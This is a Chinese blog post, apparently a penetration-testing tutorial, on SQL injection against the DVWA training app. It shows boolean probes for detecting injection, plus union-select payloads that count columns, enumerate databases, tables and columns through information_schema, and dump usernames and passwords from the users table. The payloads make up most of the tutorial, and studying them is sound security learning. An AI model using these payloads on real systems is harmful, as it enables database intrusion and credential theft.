sql注入

最新推荐文章于 2023-04-23 13:49:26 发布
最新推荐文章于 2023-04-23 13:49:26 发布
阅读量1.5k 收藏 23
点赞数 6
分类专栏: 渗透 文章标签: sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39243586/article/details/102799025
版权

sql注入


所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。网页链接存在参数传递,后台并没有对用户的输入进行过滤,导致用户的输入直接被SQL解释器执行。

sql注入

  1. 产生条件 ,①有参数传递;②参数值带入数据库查询并执行
  2. 注入类型:字符型和数字型;
  3. 字符型
    Url 地址中输入 http://xxx/abc.php?id= x’ and ‘1’=’1 页面运行正常,继续进行下一步。
      Url 地址中继续输入 http://xxx/abc.php?id= x’ and ‘1’=’2 页面运行错误,则说明此 Sql 注入为字符型注入。
  4. 数字型
    Url 地址中输入 http://xxx/abc.php?id= x and 1=1 页面依旧运行正常,继续进行下一步。
      Url 地址中继续输入 http://xxx/abc.php?id= x and 1=2 页面运行错误,则说明此 Sql 注入为数字型注入。

判断字段长度
1’ order by 2 --’ //1’+order+by+2±-’

联合查询
1’ union select 1,2 --’ //1’+union+select+1,2±-’
PS:可配合相关查询函数 user(),database(),version()

查询数据库内容
1’ union select table_schema,table_name from information_schema.COLUMNS – ’
1’+union+select+table_schema,table_name+from+information_schema.columns±-+’
前提:获取当前数据库名和表名,这里可以利用数据库特性的:mysql数据库将所有数据库名和表名以及字段名会存储在information.schema库中的COLUMNS表,另外TABLES表也存储着数据库名和表名,但没有字段名。这里选用COLUMNS表,分别字段名为TABLE_SCHEMA存储着数据库名,TABLE_NAME存储着表名,COLUMN_NAME存储着字段名。
上面可以查询到相关库和表
下面针对指定库继续查询
1’ union select table_name,column_name from information_schema.COLUMNS where table_schema=database() – ’
1’+union+select+table_name,column_name+from+information_schema.columns+where+table_schema=database()±-+’

1’ union select table_name,column_name from information_schema.columns where table_schema=‘dvwa’ – ’
1’+union+select+table_name,column_name+from+information_schema.columns+where+table_schema=‘dvwa’±-+’

获取库名和表名后
1’ union select user,password from dvwa.users – ’
1’+union+select+user,password+from+dvwa.users±-+’

姚导演
关注
  • 6
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pangolinsdl—sql注入工具
06-20
**SQL注入工具——PangolinsDL详解** SQL注入是一种常见的网络安全漏洞,它允许攻击者通过输入恶意的SQL代码来操纵或获取数据库中的敏感信息。针对这种威胁,开发者和安全研究人员常常使用SQL注入工具来进行测试和...
CISP-PTE学习总结之基础练习题(四)
千寻的博客
10-25 4161
考前练习题整理
网络安全SQL注入
最新发布
jazzz98的博客
04-23 614
所谓SQL注入,就是通过把SQL命令插入Web表单提交输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令
SQL注入漏洞-SQL注入原理与实践
HacHunter的博客
03-03 1239
什么是SQL注入?:所谓SQL注入,就是通过把SQL命令插入Web表单提交输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。 MySQL基础语法:MySQL 教程_w3cschool 浏览器打开sqli.com/sqli-1.php,其源码如下...
sqlmap之sql注入原理利用
m0_55313512的博客
02-26 2373
SqlMap
SQL 注入天书.pdf
08-06
SQL注入是一种常见的网络安全漏洞,发生在应用程序使用用户输入SQL代码直接构建数据库查询时。当攻击者能够通过输入恶意SQL语句来控制或篡改数据库查询,他们就能获取敏感信息、修改数据甚至完全控制系统。《SQL...
sql注入攻击流量情况
07-18
sql注入攻击流量情况
sql注入网站源码
04-09
SQL注入是一种常见的网络安全漏洞,主要出现在使用动态SQL语句构建数据库查询的应用程序中。这个"sql注入网站源码"提供了一个具有SQL注入漏洞的ASP(Active Server Pages)网站实例,对于学习如何检测、防范和修复这...
sql注入讲解ppt.pptx
08-10
SQL 注入基础知识点总结 SQL 注入是指 web 应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在 web 应用程序中事先定义好的查询语句的结尾上添加额外的 SQL 语句,在管理员不知情的情况下实现非法...
sql注入字典fuzz
01-11
### SQL注入字典Fuzz详解 #### 一、引言 在网络安全领域,SQL注入攻击是一种常见的威胁方式,它利用数据库应用系统中的漏洞,通过恶意构造的SQL语句来获取敏感数据或对数据库进行非法操作。为了有效地检测和防范...
metinfo 后台sql注入1
08-03
《MetInfo 后台SQL注入漏洞详解》 MetInfo,一款基于PHP和MySQL构建的内容管理系统,因其功能丰富和易于使用而广受欢迎。然而,随着技术的发展,安全问题也日益凸显。本文将深入探讨MetInfo 6.1.0版本中的一个SQL...
DB2数据库SQL注入手册1
08-08
DB2数据库SQL注入手册 DB2数据库SQL注入手册是指在使用DB2数据库时,如何检测和防止SQL注入攻击的一份指南。SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以通过在输入字段中 inject恶意SQL代码来访问或控制...
超级sql注入工具
11-02
超级SQL注入工具(SSQLInjection)是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入,支持HTTPS模式注入。 超级SQL注入工具目前支持Bool型盲注、错误显示注入、...
SQL注入思路详解
12-14
SQL注入是一种常见的网络安全威胁,它利用了Web应用程序在处理用户输入数据时的不足,使得攻击者能够构造恶意的SQL语句来控制或篡改数据库。本文将深入解析SQL注入的思路,帮助你理解和防范这种攻击。 首先,SQL...
网络安全知识之SQL注入
elricboa的专栏
12-03 873
SQL注入是什么 所谓SQL注入,就是通过把SQL命令插入Web表单提交输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。
web 漏洞入门之 —— SQL 注入教程
实验楼
07-14 5530
SQL 注入是最常见、最被人们熟知的 web 漏洞。根据百科的解释:所谓SQL注入,就是通过把SQL命令插入Web表单提交输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的...
贤皇----SQL注入
qq_38392219的博客
07-19 146
利用SQL注入漏洞登录后台 所谓SQL注入,就是通过把SQL命令插入Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令,比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的,这类表单特别容易受到SQL注入式攻击. sql注入 什么时候最易受到sql注入攻击    当应用程序使用输入内容来构造动态sql语句以访问数据库时,会发生sql...
web安全(4)-- sql注入
TaneRoom的博客
11-17 1115
注入攻击的本质就是把用户输入的数据当做代码来执行,这里有两个关键条件:第一个是用户能够控制输入,第二个是原本程序要执行的代码,拼接了用户输入的数据。
SQL注入攻击技术详解
"SQL注入实战教程,涵盖ACCESS、MySQLSQL SERVER和ORACLE的注入技巧,由讲师闵海钊讲解,内容包括注入点检测、表名和列名的猜解、长度判断等。" SQL注入是一种常见的网络安全攻击手段,攻击者通过在Web应用的输入...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值